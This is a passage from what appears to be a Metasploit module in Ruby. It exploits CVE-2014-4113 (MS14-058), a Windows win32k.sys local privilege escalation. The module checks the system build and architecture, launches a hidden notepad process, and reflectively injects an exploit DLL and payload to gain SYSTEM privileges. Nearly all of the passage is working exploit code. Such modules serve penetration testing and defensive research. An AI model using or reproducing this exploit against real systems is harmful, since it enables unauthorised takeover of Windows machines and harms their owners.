[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 2008 R2 SP1
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
['CVE', '2014-4113'],
['OSVDB', '113167'],
['BID', '70364'],
['MSB', 'MS14-058'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
],
'DisclosureDate' => 'Oct 14 2014',
'DefaultTarget' => 0
}))
end
def check
os = sysinfo["OS"]
if os !~ /windows/i
return Exploit::CheckCode::Unknown
end
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
# Neither target suports Windows 8 or 8.1
return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Unknown
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
if target.arch.first == ARCH_X86
dll_file_name = 'cve-2014-4113.x86.dll'
else
dll_file_name = 'cve-2014-4113.x64.dll'
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end